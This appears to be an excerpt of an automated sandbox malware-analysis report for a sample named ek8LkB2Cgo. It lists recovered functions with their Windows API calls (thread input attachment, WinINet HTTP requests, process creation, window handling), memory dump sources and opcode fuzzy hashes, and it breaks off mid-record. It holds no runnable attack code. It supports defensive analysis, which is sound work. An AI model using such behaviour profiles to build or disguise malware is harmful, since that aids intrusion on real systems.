                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,005330A5,?,00000001), ref: 0053409C
                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,005330A5,?,00000001), ref: 005340AE
                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,005330A5,?,00000001), ref: 005340F3
                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,005330A5,?,00000001), ref: 00534108
                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,005330A5,?,00000001), ref: 00534113
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                  • String ID:
                                                                                  • API String ID: 2156557900-0
                                                                                  • Opcode ID: 7e8662b1619ec5ba80c86e93dfa3c6284295746600d7c58f0aea96224fed24f2
                                                                                  • Instruction ID: 44439bbab7c023bf5f5e71025c8c60bc789eec3a8da40c518f70187fe48a83c9
                                                                                  • Opcode Fuzzy Hash: 7e8662b1619ec5ba80c86e93dfa3c6284295746600d7c58f0aea96224fed24f2
                                                                                  • Instruction Fuzzy Hash: 94318E71600614ABDB50DB94EC89B797FB9BF64311F108115F909A6290CBB4BE88EF60
                                                                                  Function 0056DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColor.USER32(00000008), ref: 0050B496
                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0050B4A0
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 0050B4B5
                                                                                  • GetStockObject.GDI32(00000005), ref: 0050B4BD
                                                                                  • GetClientRect.USER32(?), ref: 0056DD63
                                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 0056DD7A
                                                                                  • GetWindowDC.USER32(?), ref: 0056DD86
                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0056DD95
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0056DDA7
                                                                                  • GetSysColor.USER32(00000005), ref: 0056DDC5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3430376129-0
                                                                                  • Opcode ID: d20193b2fc98e3de72a36a0cc6fa3cb6c2666bb76daf489ab1f17128f68ee2e5
                                                                                  • Instruction ID: c2493be42aa797325e809b40ad80e2c417f954fe18b23cbd0a65835fe5bb3a85
                                                                                  • Opcode Fuzzy Hash: d20193b2fc98e3de72a36a0cc6fa3cb6c2666bb76daf489ab1f17128f68ee2e5
                                                                                  • Instruction Fuzzy Hash: 53113D31500205AFDB516B64EC48BA97F75FF14325F504625FA6AA50E1CB320985FB20
                                                                                  Function 004F3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004F30DC
                                                                                  • CoUninitialize.OLE32(?,00000000), ref: 004F3181
                                                                                  • UnregisterHotKey.USER32(?), ref: 004F32A9
                                                                                  • DestroyWindow.USER32(?), ref: 00565079
                                                                                  • FreeLibrary.KERNEL32(?), ref: 005650F8
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00565125
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                  • String ID: close all
                                                                                  • API String ID: 469580280-3243417748
                                                                                  • Opcode ID: 89129bea72350bfd3012c39ceef579c7957e4a6900240daaa2d042b32f23245d
                                                                                  • Instruction ID: 7fc3457637bf5f3b3919b6820bf5997ee4270e3534c17f0313cc6b5c39072979
                                                                                  • Opcode Fuzzy Hash: 89129bea72350bfd3012c39ceef579c7957e4a6900240daaa2d042b32f23245d
                                                                                  • Instruction Fuzzy Hash: D5914B3420010A8FC705EF15D999A79F7B4FF15309F5082AEE60A67262DF34AE5ACF58
                                                                                  Function 0050CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 0050CC15
                                                                                    • Part of subcall function 0050CCCD: GetClientRect.USER32(?,?), ref: 0050CCF6
                                                                                    • Part of subcall function 0050CCCD: GetWindowRect.USER32(?,?), ref: 0050CD37
                                                                                    • Part of subcall function 0050CCCD: ScreenToClient.USER32(?,?), ref: 0050CD5F
                                                                                  • GetDC.USER32 ref: 0056D137
                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0056D14A
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0056D158
                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0056D16D
                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0056D175
                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0056D200
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                  • String ID: U
                                                                                  • API String ID: 4009187628-3372436214
                                                                                  • Opcode ID: 03a07ac00a96308359504d6fbc2de552fd4bbef3921970e4ba62ca72355eaf5b
                                                                                  • Instruction ID: ba1c790c2214a3a7fe20dfd8305492338ab9736258987c210a89c4eba18e02cb
                                                                                  • Opcode Fuzzy Hash: 03a07ac00a96308359504d6fbc2de552fd4bbef3921970e4ba62ca72355eaf5b
                                                                                  • Instruction Fuzzy Hash: C2710330A00205DFCF218F64C895AAE7FB1FF5A320F184A6AED555B2A5D7308C41DF60
                                                                                  Function 0055ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                    • Part of subcall function 0050B63C: GetCursorPos.USER32(000000FF), ref: 0050B64F
                                                                                    • Part of subcall function 0050B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0050B66C
                                                                                    • Part of subcall function 0050B63C: GetAsyncKeyState.USER32(00000001), ref: 0050B691
                                                                                    • Part of subcall function 0050B63C: GetAsyncKeyState.USER32(00000002), ref: 0050B69F
                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0055ED3C
                                                                                  • ImageList_EndDrag.COMCTL32 ref: 0055ED42
                                                                                  • ReleaseCapture.USER32 ref: 0055ED48
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 0055EDF0
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0055EE03
                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0055EEDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                  • API String ID: 1924731296-2107944366
                                                                                  • Opcode ID: cc679a3e6a40d7381db3e5d1b708550be56c00ddbe8f2802d488a40db7800c65
                                                                                  • Instruction ID: 8b7be02908263f35a1a2bba01c663fa91bac806fede1152a877f7bf38f77287f
                                                                                  • Opcode Fuzzy Hash: cc679a3e6a40d7381db3e5d1b708550be56c00ddbe8f2802d488a40db7800c65
                                                                                  • Instruction Fuzzy Hash: B751AA30104304AFD714DF20DCAAF6A7BF8FB98704F504A1EF985962E2DB70A948DB52
                                                                                  Function 005445C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005445FF
                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0054462B
                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0054466D
                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00544682
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0054468F
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 005446BF
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00544706
                                                                                    • Part of subcall function 00545052: GetLastError.KERNEL32(?,?,005443CC,00000000,00000000,00000001), ref: 00545067
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                  • String ID:
                                                                                  • API String ID: 1241431887-3916222277
                                                                                  • Opcode ID: d06d63bbdc7b16d3a6a822a03873548029ec6e64a4286a547039f421835c7cd1
                                                                                  • Instruction ID: 8deb6b3cd2093da075d69e338f887091315ad256fb664680f89c1ea0212b8d03
                                                                                  • Opcode Fuzzy Hash: d06d63bbdc7b16d3a6a822a03873548029ec6e64a4286a547039f421835c7cd1
                                                                                  • Instruction Fuzzy Hash: 87418BB1541209BFEB069F50DC89FFA7BACFF09358F00401AFA059A181EBB099449BA4
                                                                                  Function 0054B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0058DC00), ref: 0054B715
                                                                                  • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0058DC00), ref: 0054B749
                                                                                  • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0054B8C1
                                                                                  • SysFreeString.OLEAUT32(?), ref: 0054B8EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                  • String ID:
                                                                                  • API String ID: 560350794-0
                                                                                  • Opcode ID: 4f072a72504d12cc8a5dc90c90da572ed987a01364c34003756f096fb8b66201
                                                                                  • Instruction ID: 8839673ee053458b25cefc82d903da3294ceaffe91d3451e0a636e0ef9ab0a53
                                                                                  • Opcode Fuzzy Hash: 4f072a72504d12cc8a5dc90c90da572ed987a01364c34003756f096fb8b66201
                                                                                  • Instruction Fuzzy Hash: F3F1F975A00109AFDB04DF94C888EEEBBB9FF89319F148459E905AB250DB31EE45DB50
                                                                                  Function 005524D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 005524F5
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00552688
                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 005526AC
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 005526EC
                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0055270E
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0055286F
                                                                                  • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 005528A1
                                                                                  • CloseHandle.KERNEL32(?), ref: 005528D0
                                                                                  • CloseHandle.KERNEL32(?), ref: 00552947
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                  • String ID:
                                                                                  • API String ID: 4090791747-0
                                                                                  • Opcode ID: c2ba26798aea79a68bac1065c0e07fd57d7184dbcfdb222c84e8062807e72ebf
                                                                                  • Instruction ID: c8e1d44412c490df982e3d0f23b1906968431b54340da1df8f84e5863a6ed417
                                                                                  • Opcode Fuzzy Hash: c2ba26798aea79a68bac1065c0e07fd57d7184dbcfdb222c84e8062807e72ebf
                                                                                  • Instruction Fuzzy Hash: 1DD1AE35604201DFCB14EF24C8A5A6EBFE1BF89314F14895EF9899B2A2DB31DC45CB52
                                                                                  Function 0055B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0055B3F4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InvalidateRect
                                                                                  • String ID:
                                                                                  • API String ID: 634782764-0
                                                                                  • Opcode ID: 548bffe0ee1630b369dc592a15398a4de9e795e3f52ec4372d7dbd56876b0924
                                                                                  • Instruction ID: 4a36def8998d4b03585fd3212aa8daa897e2329916944954c714aad06f9d1784
                                                                                  • Opcode Fuzzy Hash: 548bffe0ee1630b369dc592a15398a4de9e795e3f52ec4372d7dbd56876b0924
                                                                                  • Instruction Fuzzy Hash: 1751AE30500205EAFF349E288CADBAD7F75BB04316F644513FE15E61E2E771AA889A50
                                                                                  Function 0050A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0056DB1B
                                                                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0056DB3C
                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0056DB51
                                                                                  • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0056DB6E
                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0056DB95
                                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0050A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0056DBA0
                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0056DBBD
                                                                                  • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0050A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0056DBC8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 1268354404-0
                                                                                  • Opcode ID: 1822a41b95aac0179b8f8e51b4af2e2f03ceecea950417913602b3824c3b7c79
                                                                                  • Instruction ID: 241a76fc803b6ec7e675dfa336435f78a3031d928cf1aa1d5e88f3ec7f4f816f
                                                                                  • Opcode Fuzzy Hash: 1822a41b95aac0179b8f8e51b4af2e2f03ceecea950417913602b3824c3b7c79
                                                                                  • Instruction Fuzzy Hash: 5D514B70A00709EFDB20DF65CC95FAA7BB5FB58750F104A19F946972E0D7B0A980DB60
                                                                                  Function 00537555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00535FA6,?), ref: 00536ED8
                                                                                    • Part of subcall function 00536EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00535FA6,?), ref: 00536EF1
                                                                                    • Part of subcall function 005372CB: GetFileAttributesW.KERNEL32(?,00536019), ref: 005372CC
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 005375CA
                                                                                  • _wcscmp.LIBCMT ref: 005375E2
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 005375FB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 793581249-0
                                                                                  • Opcode ID: ba9b946502d5f9fa2f62a1186cd7bd9fea3d0e366bde2301884dd0e928d8be23
                                                                                  • Instruction ID: e60b978ce8621ec4d0139e8487154899b8535774e1c0fdfa431019694359244c
                                                                                  • Opcode Fuzzy Hash: ba9b946502d5f9fa2f62a1186cd7bd9fea3d0e366bde2301884dd0e928d8be23
                                                                                  • Instruction Fuzzy Hash: 0B510EB2E0921D5ADF64EB94D8859DEB7BCAF4C310F0044AAF609E3141EA7496C9CF64
                                                                                  Function 0050EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0056DAD1,00000004,00000000,00000000), ref: 0050EAEB
                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0056DAD1,00000004,00000000,00000000), ref: 0050EB32
                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0056DAD1,00000004,00000000,00000000), ref: 0056DC86
                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0056DAD1,00000004,00000000,00000000), ref: 0056DCF2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: e26d57d3b3d8fe40b5152dd4a85f3280c84f6d7a932ba08fa16883031148e5e5
                                                                                  • Instruction ID: 80bf24e2db7a55a604076dd2d708419ea8b227e89034b7037ad216aa3f24c009
                                                                                  • Opcode Fuzzy Hash: e26d57d3b3d8fe40b5152dd4a85f3280c84f6d7a932ba08fa16883031148e5e5
                                                                                  • Instruction Fuzzy Hash: 5941B4707056849AD77A4B289D8FB7E7EA5BF55304F790C09E04B879E1C670BC84E721
                                                                                  Function 0052B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0052AEF1,00000B00,?,?), ref: 0052B26C
                                                                                  • HeapAlloc.KERNEL32(00000000,?,0052AEF1,00000B00,?,?), ref: 0052B273
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0052AEF1,00000B00,?,?), ref: 0052B288
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,0052AEF1,00000B00,?,?), ref: 0052B290
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,0052AEF1,00000B00,?,?), ref: 0052B293
                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0052AEF1,00000B00,?,?), ref: 0052B2A3
                                                                                  • GetCurrentProcess.KERNEL32(0052AEF1,00000000,?,0052AEF1,00000B00,?,?), ref: 0052B2AB
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,0052AEF1,00000B00,?,?), ref: 0052B2AE
                                                                                  • CreateThread.KERNEL32(00000000,00000000,0052B2D4,00000000,00000000,00000000), ref: 0052B2C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
